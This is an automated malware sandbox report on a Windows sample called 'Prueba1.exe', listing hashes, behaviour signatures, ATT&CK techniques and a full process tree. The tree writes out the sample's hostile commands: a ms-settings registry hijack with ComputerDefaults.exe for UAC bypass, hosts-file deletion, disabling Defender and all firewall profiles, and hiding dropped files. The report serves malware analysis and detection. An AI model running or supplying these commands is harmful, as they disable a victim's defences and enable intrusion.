Analysis
max time kernel: 1793s
max time network: 1161s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25/09/2024, 17:58
Static task: static1
Behavioral task: behavioral1
  Sample: Prueba1.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Prueba1.exe
  Resource: win10v2004-20240802-en
General
Target: Prueba1.exe
Size: 227KB
MD5: 4339cc7cb7c8df84a3a1bbd3cba4cf17
SHA1: b041a7ac27006a3d204726cecef465a34f06a3f3
SHA256: e3ebbde456c0c20d1436661909137cd38ce6be51cf78e7cb0d2944b124bed326
SHA512: 3e795d43daa63db9435ab3d03a6800719f25b1f8311188148c5ac51eea1835ca76a6fb10040559271e42de7b3d5e18dda89a572fb975ee60f6a90d1575a85f31
SSDEEP: 3072:W+PSS5WcZM55FjBcmnE2V/anyoQI5swjEG6vpRcuKtK41rL2JtjwKk:tPSPX5FWhMwj16xrcKaLWjwKk
Malware Config
Signatures
Modifies Windows Firewall (2 TTPs, 3 IoCs)
  pid   Process
  5076  netsh.exe
  1016  netsh.exe
  4720  netsh.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                              Process
  Key value queried  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation  wscript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation  wscript.exe

Executes dropped EXE (4 IoCs)
  pid   Process
  2492  ZmbyrFypnUjzwf2LD7LMX006.exe
  2004  NakedElephants.jpeg
  1328  NakedElephants.jpeg
  4100  NakedElephants.jpeg

Command and Scripting Interpreter: PowerShell (1 IoCs)
  pid   Process
  1620  powershell.exe
Indicator Removal: File Deletion (1 TTPs)
Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  14    raw.githubusercontent.com
  16    raw.githubusercontent.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  60    checkip.amazonaws.com

Hide Artifacts: Hidden Files and Directories (1 TTPs, 1 IoCs)
  pid   Process
  3572  cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
  pid   Process
  2004  NakedElephants.jpeg
  2004  NakedElephants.jpeg
  4100  NakedElephants.jpeg
  4100  NakedElephants.jpeg

Drops file in Windows directory (3 IoCs)
  description                   ioc                      Process
  File created                  C:\Windows\profapi.dll   ZmbyrFypnUjzwf2LD7LMX006.exe
  File opened for modification  C:\Windows\profapi.dll   ZmbyrFypnUjzwf2LD7LMX006.exe
  File opened for modification  C:\Windows\profapi.dll   attrib.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL (1 TTPs, 9 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description           ioc                                       Process
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe

Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  description        ioc                                                                                                                                                   Process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000                                                    taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName                                       taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000                                                    taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName                                       taskmgr.exe

Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                                  Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  ZmbyrFypnUjzwf2LD7LMX006.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  taskmgr.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      ZmbyrFypnUjzwf2LD7LMX006.exe

Modifies registry class (22 IoCs)
  description      ioc                                                                                                                            Process
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command                                  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open                                          reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings                                                     reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell                                               reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\993027.vbs"  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute                  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings                                                     reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command                                  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command                                  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command                                  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings                                                     reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command                                  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\450650.vbs"  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell                                               reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command                                  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open                                          reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open                                          reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell                                               reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell                                               reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open                                          reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute                  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings                                                     reg.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs; duplicate rows collapsed)
  pid   Process
  2492  ZmbyrFypnUjzwf2LD7LMX006.exe  (repeated; every row except the two below)
  1620  powershell.exe  (x2)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid   Process
  3516  Explorer.EXE

Suspicious use of AdjustPrivilegeToken (64 IoCs; duplicate rows collapsed, original order kept)
  description                        pid   Process
  Token: SeDebugPrivilege            1620  powershell.exe
  Token: SeDebugPrivilege            2492  ZmbyrFypnUjzwf2LD7LMX006.exe  (x2)
  Token: SeShutdownPrivilege         3516  Explorer.EXE  (repeated throughout, alternating with the next row)
  Token: SeCreatePagefilePrivilege   3516  Explorer.EXE  (repeated throughout)
  Token: SeDebugPrivilege            2712  taskmgr.exe
  Token: SeSystemProfilePrivilege    2712  taskmgr.exe
  Token: SeCreateGlobalPrivilege     2712  taskmgr.exe
  Token: 33                          2712  taskmgr.exe
  Token: SeIncBasePriorityPrivilege  2712  taskmgr.exe
  Token: SeDebugPrivilege            5064  taskmgr.exe
  Token: SeSystemProfilePrivilege    5064  taskmgr.exe
  Token: SeCreateGlobalPrivilege     5064  taskmgr.exe
  Token: SeShutdownPrivilege         3516  Explorer.EXE  (final row)

Suspicious use of FindShellTrayWindow (64 IoCs; duplicate rows collapsed)
  pid   Process
  2712  taskmgr.exe  (repeated)
  3516  Explorer.EXE  (repeated)
  5064  taskmgr.exe  (repeated)

Suspicious use of SendNotifyMessage (64 IoCs; duplicate rows collapsed)
  pid   Process
  2712  taskmgr.exe  (repeated)
  3516  Explorer.EXE  (repeated)
  5064  taskmgr.exe  (repeated)

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  2492  ZmbyrFypnUjzwf2LD7LMX006.exe

Suspicious use of WriteProcessMemory (64 IoCs; each row appears twice in the original unless noted)
  description                        pid   Process                       procid_target
  PID 4100 wrote to memory of 216    4100  Prueba1.exe                   83
  PID 216 wrote to memory of 1728    216   cmd.exe                       85
  PID 4100 wrote to memory of 5036   4100  Prueba1.exe                   86
  PID 5036 wrote to memory of 536    5036  cmd.exe                       88
  PID 5036 wrote to memory of 1864   5036  cmd.exe                       89
  PID 4100 wrote to memory of 1720   4100  Prueba1.exe                   90
  PID 1720 wrote to memory of 2804   1720  cmd.exe                       92
  PID 2804 wrote to memory of 4432   2804  ComputerDefaults.exe          93
  PID 4432 wrote to memory of 2512   4432  wscript.exe                   94
  PID 4100 wrote to memory of 4036   4100  Prueba1.exe                   97
  PID 4100 wrote to memory of 4944   4100  Prueba1.exe                   99
  PID 4944 wrote to memory of 4212   4944  cmd.exe                       101
  PID 4100 wrote to memory of 4288   4100  Prueba1.exe                   102
  PID 4288 wrote to memory of 4208   4288  cmd.exe                       104
  PID 4100 wrote to memory of 1628   4100  Prueba1.exe                   105
  PID 1628 wrote to memory of 1056   1628  cmd.exe                       108
  PID 1628 wrote to memory of 8      1628  cmd.exe                       110
  PID 4100 wrote to memory of 1964   4100  Prueba1.exe                   111
  PID 1964 wrote to memory of 2012   1964  cmd.exe                       113
  PID 2012 wrote to memory of 1612   2012  ComputerDefaults.exe          114
  PID 1612 wrote to memory of 3592   1612  wscript.exe                   115
  PID 3592 wrote to memory of 2492   3592  cmd.exe                       117
  PID 4100 wrote to memory of 4596   4100  Prueba1.exe                   120
  PID 4100 wrote to memory of 2932   4100  Prueba1.exe                   122
  PID 2932 wrote to memory of 3924   2932  cmd.exe                       124
  PID 2492 wrote to memory of 3516   2492  ZmbyrFypnUjzwf2LD7LMX006.exe  56   (x13)
  PID 2492 wrote to memory of 3572   2492  ZmbyrFypnUjzwf2LD7LMX006.exe  128  (x1)

Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid   Process
  4232  attrib.exe
Processes
Process tree (bracketed number is the depth in the tree; the indented bullets are the signatures that fired for that process).

[1] C:\Windows\Explorer.EXE  (PID 3516)
    cmdline: C:\Windows\Explorer.EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  [2] C:\Users\Admin\AppData\Local\Temp\Prueba1.exe  (PID 4100)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Prueba1.exe"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe  (PID 216)
        cmdline: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 1728)
          cmdline: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    [3] C:\Windows\system32\cmd.exe  (PID 5036)
        cmdline: /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 536)
          cmdline: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f
          - Modifies registry class
      [4] C:\Windows\system32\reg.exe  (PID 1864)
          cmdline: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          - Modifies registry class
    [3] C:\Windows\system32\cmd.exe  (PID 1720)
        cmdline: /c start /B ComputerDefaults.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\ComputerDefaults.exe  (PID 2804)
          cmdline: ComputerDefaults.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\wscript.exe  (PID 4432)
            cmdline: "wscript.exe" C:\Users\Admin\AppData\Local\Temp\450650.vbs
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\System32\cmd.exe  (PID 2512)
              cmdline: "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
    [3] C:\Windows\system32\cmd.exe  (PID 4036)
        cmdline: /c del /f C:\Users\Admin\AppData\Local\Temp\450650.vbs
    [3] C:\Windows\system32\cmd.exe  (PID 4944)
        cmdline: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 4212)
          cmdline: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          - Modifies registry class
    [3] C:\Windows\system32\cmd.exe  (PID 4288)
        cmdline: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 4208)
          cmdline: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    [3] C:\Windows\system32\cmd.exe  (PID 1628)
        cmdline: /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 1056)
          cmdline: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f
          - Modifies registry class
      [4] C:\Windows\system32\reg.exe  (PID 8)
          cmdline: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          - Modifies registry class
    [3] C:\Windows\system32\cmd.exe  (PID 1964)
        cmdline: /c start /B ComputerDefaults.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\ComputerDefaults.exe  (PID 2012)
          cmdline: ComputerDefaults.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\wscript.exe  (PID 1612)
            cmdline: "wscript.exe" C:\Users\Admin\AppData\Local\Temp\993027.vbs
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\System32\cmd.exe  (PID 3592)
              cmdline: "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe  (PID 2492)
                cmdline: C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu
                - Executes dropped EXE
                - Drops file in Windows directory
                - Checks processor information in registry
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of SetWindowsHookEx
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\system32\cmd.exe  (PID 3572)
                  cmdline: /c attrib +h "C:\Windows\profapi.dll"
                  - Hide Artifacts: Hidden Files and Directories
                [9] C:\Windows\system32\attrib.exe  (PID 4232)
                    cmdline: attrib +h "C:\Windows\profapi.dll"
                    - Drops file in Windows directory
                    - Views/modifies file attributes
              [8] C:\Windows\system32\cmd.exe  (PID 804)
                  cmdline: /c REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul
                [9] C:\Windows\system32\reg.exe  (PID 2656)
                    cmdline: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0
              [8] C:\Windows\system32\cmd.exe  (PID 992)
                  cmdline: /c powershell Set-MpPreference -DisableRealtimeMonitoring $true >nul 2>&1
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1620)
                    cmdline: powershell Set-MpPreference -DisableRealtimeMonitoring $true
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\system32\cmd.exe  (PID 3576)
                  cmdline: /c netsh advfirewall set privateprofile state off >nul 2>&1
                [9] C:\Windows\system32\netsh.exe  (PID 5076)
                    cmdline: netsh advfirewall set privateprofile state off
                    - Modifies Windows Firewall
                    - Event Triggered Execution: Netsh Helper DLL
              [8] C:\Windows\system32\cmd.exe  (PID 4432)
                  cmdline: /c netsh advfirewall set domainprofile state off >nul 2>&1
                [9] C:\Windows\system32\netsh.exe  (PID 1016)
                    cmdline: netsh advfirewall set domainprofile state off
                    - Modifies Windows Firewall
                    - Event Triggered Execution: Netsh Helper DLL
              [8] C:\Windows\system32\cmd.exe  (PID 3256)
                  cmdline: /c netsh advfirewall set publicprofile state off >nul 2>&1
                [9] C:\Windows\system32\netsh.exe  (PID 4720)
                    cmdline: netsh advfirewall set publicprofile state off
                    - Modifies Windows Firewall
                    - Event Triggered Execution: Netsh Helper DLL
              [8] C:\Windows\system32\cmd.exe  (PID 4996)
                  cmdline: /c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul
                [9] C:\Windows\system32\reg.exe  (PID 4616)
                    cmdline: REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f
              [8] C:\ProgramData\NakedElephants.jpeg  (PID 2004)
                  cmdline: C:\ProgramData\NakedElephants.jpeg FuckHerFace
                  - Executes dropped EXE
                  - Suspicious use of NtSetInformationThreadHideFromDebugger
              [8] C:\ProgramData\NakedElephants.jpeg  (PID 1328)
                  cmdline: C:\ProgramData\NakedElephants.jpeg FuckHerFace
                  - Executes dropped EXE
              [8] C:\ProgramData\NakedElephants.jpeg  (PID 4100)
                  cmdline: C:\ProgramData\NakedElephants.jpeg FuckHerFace
                  - Executes dropped EXE
                  - Suspicious use of NtSetInformationThreadHideFromDebugger
    [3] C:\Windows\system32\cmd.exe  (PID 4596)
        cmdline: /c del /f C:\Users\Admin\AppData\Local\Temp\993027.vbs
    [3] C:\Windows\system32\cmd.exe  (PID 2932)
        cmdline: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe  (PID 3924)
          cmdline: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          - Modifies registry class
  [2] C:\Windows\system32\taskmgr.exe  (PID 2712)
      cmdline: "C:\Windows\system32\taskmgr.exe" /4
      - Checks SCSI registry key(s)
      - Checks processor information in registry
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
  [2] C:\Windows\system32\taskmgr.exe  (PID 5064)
      cmdline: "C:\Windows\system32\taskmgr.exe" /4
      - Checks SCSI registry key(s)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Persistence
  Create or Modify System Process (1)
    Windows Service (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
Privilege Escalation
  Create or Modify System Process (1)
    Windows Service (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
Defense Evasion
  Hide Artifacts (2)
    Hidden Files and Directories (2)
  Impair Defenses (1)
    Disable or Modify System Firewall (1)
  Indicator Removal (1)
    File Deletion (1)
Downloads
- Filesize: 38.3MB
  MD5: 40532ea36c2d4de56522ecf707bf289e
  SHA1: 86520c67e37b43366f965b63ba78070688bff83e
  SHA256: 08e994aa4659a0fd4674d93ed9e683dff7c020013629e39d6ea73091f2bcd33b
  SHA512: 41df9cc910afe6ffe7f92e1e26b607cf7fea18f52a746ca97d532406401035b5bb3ac5ebcb9bc659d4125cbf7262383aefc1f03a01886dc71e268b52ac2b43ce
- Filesize: 1KB
  MD5: 7fb5fa1534dcf77f2125b2403b30a0ee
  SHA1: 365d96812a69ac0a4611ea4b70a3f306576cc3ea
  SHA256: 33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
  SHA512: a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
- Filesize: 436B
  MD5: 971c514f84bba0785f80aa1c23edfd79
  SHA1: 732acea710a87530c6b08ecdf32a110d254a54c8
  SHA256: f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
  SHA512: 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
  Filesize: 174B
  MD5: 6f9f0907d5726cd3872dda395848d100
  SHA1: 5832d2f1ad8caf5a8d532be7bae21fc1fadbd583
  SHA256: 3a17f5275d455c560b0ae68665355262e2c100762b52e19328507d4ed8e44aff
  SHA512: b56cf8a7f295d69b567d53b6d0530f435ec7c5ad384be67471c5c7407a1db415e13edb50080cffe8db8ab78267a37a84bfe5b698c493dfdf5f5747764ecb0263
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
  Filesize: 170B
  MD5: d6a0be01101794f0ce610ffb02825391
  SHA1: 3cf7accacb755e93e2755d32a98ae6a13bb83522
  SHA256: 4540f1fd59d77cc8b1638adbe60e927dce7ae088626be11ed0b2f23f3e0635e6
  SHA512: e89df18eb8181b71659ad992025233186b9b99bc41048ad90d300eb77f91304f4f9cbe23f8824756073782420e927ae3fcf77b2385623c1e5536e24568af5ceb
- Filesize: 64KB
  MD5: d2fb266b97caff2086bf0fa74eddb6b2
  SHA1: 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
  SHA256: b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
  SHA512: c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
- Filesize: 4B
  MD5: f49655f856acb8884cc0ace29216f511
  SHA1: cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
  SHA256: 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
  SHA512: 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
- Filesize: 944B
  MD5: 6bd369f7c74a28194c991ed1404da30f
  SHA1: 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
  SHA256: 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
  SHA512: 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
- Filesize: 2.8MB
  MD5: 958ad5bc744e1f8a1b09e246b5f6a182
  SHA1: 63d7709c189f60d8e94b4e8a0559347b8c48350b
  SHA256: 94e1f52951c77d6314cb353a6f6bbb085395551f37882483ceaf72a09ff145cc
  SHA512: 69719818d54fe31758e7bb0a736411cdf18275becb6e5b4c64b8b667f75bc08e3f8556959560d77ea651fe696bed6c0a0c0131a7ee4b77de6785f6c0fc073a6a
- Filesize: 125B
  MD5: 8b4ed5c47fdddbeba260ef11cfca88c6
  SHA1: 868f11f8ed78ebe871f9da182d053f349834b017
  SHA256: 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
  SHA512: 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
- Filesize: 241B
  MD5: 382e1bc1c9c5a5c923e52180214218b5
  SHA1: ccc2e84c8520f755a5f05cf23acf74409ebd8ffb
  SHA256: 8a550aa1569d9047511f8641fec570f4a3de8449738b18deb22a07bfdb496e82
  SHA512: 4acd3582daa524b30d862cf166f4a3e44e0f52b442598b65082aec10468ade1643e646277fc9fe4bb9b333ad43275553217f031a08afe296f1fa76f4bb6917af
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 162KB
  MD5: 2b49be49c486e465f9f9d80f5c3f7460
  SHA1: 4d007b11d467bdabd2dcf063fd8572f81c046e5f
  SHA256: 113b0ab445c515fe24c0cced2651d59835279410a58ab33c5fb3d3c3507bf9b8
  SHA512: ab2f6620ee02248613948b301fe5aa129f57603247a050b09c5b33c75e5ef05a89bd54a6a440155e1578da0ce8f1f79ba9e5f3e245d37cbcede17f1a334d6696